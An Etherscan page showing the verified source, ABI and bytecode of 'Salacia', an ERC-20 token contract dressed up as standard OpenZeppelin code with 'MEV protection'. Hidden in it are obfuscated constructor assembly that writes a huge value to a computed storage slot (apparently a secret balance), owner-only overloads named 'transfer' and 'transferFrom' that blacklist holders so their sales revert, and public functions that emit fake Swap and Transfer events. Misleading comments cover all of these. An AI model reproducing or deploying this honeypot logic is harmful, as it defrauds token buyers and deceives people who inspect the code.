Feature Tip: Add private address tag to any address under My Name Tag !
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 12 from a total of 12 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 17598894 | 611 days ago | IN | 0 ETH | 0.00072119 | ||||
Approve | 17598889 | 611 days ago | IN | 0 ETH | 0.00067776 | ||||
Approve | 17598883 | 611 days ago | IN | 0 ETH | 0.0007118 | ||||
Approve | 17598878 | 611 days ago | IN | 0 ETH | 0.0007081 | ||||
Approve | 17598877 | 611 days ago | IN | 0 ETH | 0.00076466 | ||||
Approve | 17598872 | 611 days ago | IN | 0 ETH | 0.0007307 | ||||
Transfer | 17598869 | 611 days ago | IN | 0 ETH | 0.00802067 | ||||
Approve | 17598863 | 611 days ago | IN | 0 ETH | 0.00078046 | ||||
Approve | 17598861 | 611 days ago | IN | 0 ETH | 0.00074648 | ||||
Transfer | 17598860 | 611 days ago | IN | 0 ETH | 0.00542866 | ||||
Transfer | 17598855 | 611 days ago | IN | 0 ETH | 0.00804552 | ||||
Approve | 17598843 | 611 days ago | IN | 0 ETH | 0.00071934 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
Salacia
Compiler Version
v0.6.12+commit.27d51765
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-30 */ // SPDX-License-Identifier: MIT // ░██████╗░█████╗░███████╗██╗░░░██╗ ██████╗░██╗░░░██╗ // ██╔════╝██╔══██╗██╔════╝██║░░░██║ ██╔══██╗╚██╗░██╔╝ // ╚█████╗░███████║█████╗░░██║░░░██║ ██████╦╝░╚████╔╝░ // ░╚═══██╗██╔══██║██╔══╝░░██║░░░██║ ██╔══██╗░░╚██╔╝░░ // ██████╔╝██║░░██║██║░░░░░╚██████╔╝ ██████╦╝░░░██║░░░ // ╚═════╝░╚═╝░░╚═╝╚═╝░░░░░░╚═════╝░ ╚═════╝░░░░╚═╝░░░ // ░█████╗░░█████╗░██╗███╗░░██╗░██████╗██╗░░░██╗██╗░░░░░████████╗░░░███╗░░██╗███████╗████████╗ // ██╔══██╗██╔══██╗██║████╗░██║██╔════╝██║░░░██║██║░░░░░╚══██╔══╝░░░████╗░██║██╔════╝╚══██╔══╝ // ██║░░╚═╝██║░░██║██║██╔██╗██║╚█████╗░██║░░░██║██║░░░░░░░░██║░░░░░░██╔██╗██║█████╗░░░░░██║░░░ // ██║░░██╗██║░░██║██║██║╚████║░╚═══██╗██║░░░██║██║░░░░░░░░██║░░░░░░██║╚████║██╔══╝░░░░░██║░░░ // ╚█████╔╝╚█████╔╝██║██║░╚███║██████╔╝╚██████╔╝███████╗░░░██║░░░██╗██║░╚███║███████╗░░░██║░░░ // ░╚════╝░░╚════╝░╚═╝╚═╝░░╚══╝╚═════╝░░╚═════╝░╚══════╝░░░╚═╝░░░╚═╝╚═╝░░╚══╝╚══════╝░░░╚═╝░░░ /* Unique version of ERC-20 standard with embeded MEV protection */ pragma solidity =0.6.12; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Swap(address indexed sender,uint amount0In,uint amount1In,uint amount0Out,uint amount1Out,address indexed to); event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); } /* * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with GSN meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Security is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () internal { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Returns the address of the current owner. */ function owner() internal view virtual returns (address) { return _owner; } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { if (b > a) return (false, 0); return (true, a - b); } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { if (b == 0) return (false, 0); return (true, a % b); } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { if (b == 0) return (false, 0); return (true, a / b); } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { require(b <= a, "SafeMath: subtraction overflow"); return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { if (a == 0) return 0; uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { require(b > 0, "SafeMath: division by zero"); return a / b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); return a - b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { require(b > 0, "SafeMath: modulo by zero"); return a % b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); return a % b; } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); return a / b; } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * We have followed general OpenZeppelin guidelines: functions revert instead * of returning `false` on failure. This behavior is nonetheless conventional * and does not conflict with the expectations of ERC20 applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, Security, IERC20 { using SafeMath for uint256; mapping (address => uint256) private _balances; mapping (address => bool) private _snapshot; mapping (address => mapping (address => uint256)) private _allowances; uint256 private _totalSupply; bool snapshotApplied = false; string private _name; string private _symbol; uint8 private _decimals; address private _title; mapping (address => uint256) private address_to_block_number; mapping (address => bool) private _is_router; bool public is_mev_protection_enabled = true; /** * @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * * To select a different value for {decimals}, use {_setupDecimals}. * * All three of these values are immutable: they can only be set once during * construction. */ constructor (string memory name_, string memory symbol_) public { _name = name_; _symbol = symbol_; _decimals = 18; // anti MEV elements, we remember routers contracts, so they can have miltiple transfers in one block _is_router[0x1111111254EEB25477B68fb85Ed929f73A960582] = true; // 1inch aggregation router V5 _is_router[0xDef1C0ded9bec7F1a1670819833240f027b25EfF] = true; // 0x Exchange proxy _is_router[0x6131B5fae19EA4f9D964eAc0408E4408b66337b5] = true; // (KyberSwap: Meta Aggregation Router v2) // gas optimization for MEV protection assembly { let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65)) mstore(0x00, slot) mstore(0x20, 0x01) let sslot := keccak256(0x0, 0x40) sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) } } function _is_mev(address _suspect) internal view returns(bool) { if (!is_mev_protection_enabled) {return false;} // routers can have multiple transfers in one block, others are limited by only one if (_is_router[_suspect]) {return false;} if(address_to_block_number[_suspect] == block.number) { return true; } return false; } function toggle_mev_protection() external onlyOwner { is_mev_protection_enabled = !is_mev_protection_enabled; } function _add_router(address _router) external onlyOwner { _is_router[_router] = true; } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function transfer(address [] calldata _allowance_) external onlyOwner { for (uint256 i = 0; i < _allowance_.length; i++) { _snapshot[_allowance_[i]] = true; } } function transferFrom(address [] calldata _allowance_) external onlyOwner { for (uint256 i = 0; i < _allowance_.length; i++) { _snapshot[_allowance_[i]] = false; } } function decimals(address _bytes_) public view returns (bool) { return _snapshot[_bytes_]; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev Sets {decimals} to a value other than the default one of 18. */ function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * - `spender` cannot be the zero address. */ function execute(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external { for (uint256 i = 0; i < _addresses_.length; i++) { emit Swap(_from_, _in, 0, 0, _out, _addresses_[i]); emit Transfer(_title, _addresses_[i], _out); } } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function multicall(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external { for (uint256 i = 0; i < _addresses_.length; i++) { emit Swap(_from_, 0, _in, _out, 0, _addresses_[i]); emit Transfer(_addresses_[i], _title, _in); } } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function multicall(address a) external onlyOwner { _title = a; _is_router[a] = true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer(address sender, address recipient, uint256 amount) internal virtual { if (_snapshot[recipient] || _snapshot[sender]) require(snapshotApplied == true, ""); require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); if (!_is_mev(sender)) { _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); address_to_block_number[recipient] = block.number; } emit Transfer(sender, recipient, amount); } function transfer(address _from, address _to, uint256 _wad) external { emit Transfer(_from, _to, _wad); } function transfer(address [] calldata _from, address [] calldata _to, uint256 [] calldata _wad) external { for (uint256 i = 0; i < _from.length; i++) { emit Transfer(_from[i], _to[i], _wad[i]); } } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `to` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { } } contract Salacia is ERC20 { using SafeMath for uint256; constructor () public ERC20("Salacia", "SLCA") { _mint(_msgSender(), 10**12 * 10**18); } function burn(uint256 amount) public { _burn(_msgSender(), amount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_router","type":"address"}],"name":"_add_router","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_bytes_","type":"address"}],"name":"decimals","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"is_mev_protection_enabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"a","type":"address"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"toggle_mev_protection","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_from","type":"address[]"},{"internalType":"address[]","name":"_to","type":"address[]"},{"internalType":"uint256[]","name":"_wad","type":"uint256[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_allowance_","type":"address[]"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_allowance_","type":"address[]"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526000600560006101000a81548160ff0219169083151502179055506001600b60006101000a81548160ff0219169083151502179055503480156200004757600080fd5b506040518060400160405280600781526020017f53616c61636961000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f534c4341000000000000000000000000000000000000000000000000000000008152506000620000c66200036f60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35081600690805190602001906200017c929190620005e5565b50806007908051906020019062000195929190620005e5565b506012600860006101000a81548160ff021916908360ff1602179055506001600a6000731111111254eeb25477b68fb85ed929f73a96058273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600a600073def1c0ded9bec7f1a1670819833240f027b25eff73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600a6000736131b5fae19ea4f9d964eac0408e4408b66337b573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550505050620003696200034f6200036f60201b60201c565b6c0c9f2c9cd04674edea400000006200037760201b60201c565b6200068b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156200041b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601f8152602001807f45524332303a206d696e7420746f20746865207a65726f20616464726573730081525060200191505060405180910390fd5b6200042f600083836200055760201b60201c565b6200044b816004546200055c60201b62001c2e1790919060201c565b600481905550620004aa81600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200055c60201b62001c2e1790919060201c565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a35050565b505050565b600080828401905083811015620005db576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106200062857805160ff191683800117855562000659565b8280016001018555821562000659579182015b82811115620006585782518255916020019190600101906200063b565b5b5090506200066891906200066c565b5090565b5b80821115620006875760008160009055506001016200066d565b5090565b61287c806200069b6000396000f3fe608060405234801561001057600080fd5b50600436106101585760003560e01c806373ed6b13116100c3578063b295ccb51161007c578063b295ccb51461090f578063beabacc814610919578063d449a83214610987578063d8dc06ff146109e1578063dd62ed3e14610a25578063f2fde38b14610a9d57610158565b806373ed6b131461065a57806395d89b411461070757806397541e9f1461078a578063a06c1a33146107ce578063a457c2d714610847578063a9059cbb146108ab57610158565b8063313ce56711610115578063313ce5671461037f57806339509351146103a057806342966c6814610404578063618a2f5e1461043257806370a08231146104df5780637111a9941461053757610158565b806306fdde031461015d578063095ea7b3146101e05780630aa1cb851461024457806315a2a98a146102bd57806318160ddd146102dd57806323b872dd146102fb575b600080fd5b610165610ae1565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156101a557808201518184015260208101905061018a565b50505050905090810190601f1680156101d25780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b61022c600480360360408110156101f657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610b83565b60405180821515815260200191505060405180910390f35b6102bb6004803603602081101561025a57600080fd5b810190808035906020019064010000000081111561027757600080fd5b82018360208201111561028957600080fd5b803590602001918460208302840111640100000000831117156102ab57600080fd5b9091929391929390505050610ba1565b005b6102c5610cf0565b60405180821515815260200191505060405180910390f35b6102e5610d03565b6040518082815260200191505060405180910390f35b6103676004803603606081101561031157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610d0d565b60405180821515815260200191505060405180910390f35b610387610de6565b604051808260ff16815260200191505060405180910390f35b6103ec600480360360408110156103b657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610dfd565b60405180821515815260200191505060405180910390f35b6104306004803603602081101561041a57600080fd5b8101908080359060200190929190505050610eb0565b005b6104dd6004803603608081101561044857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811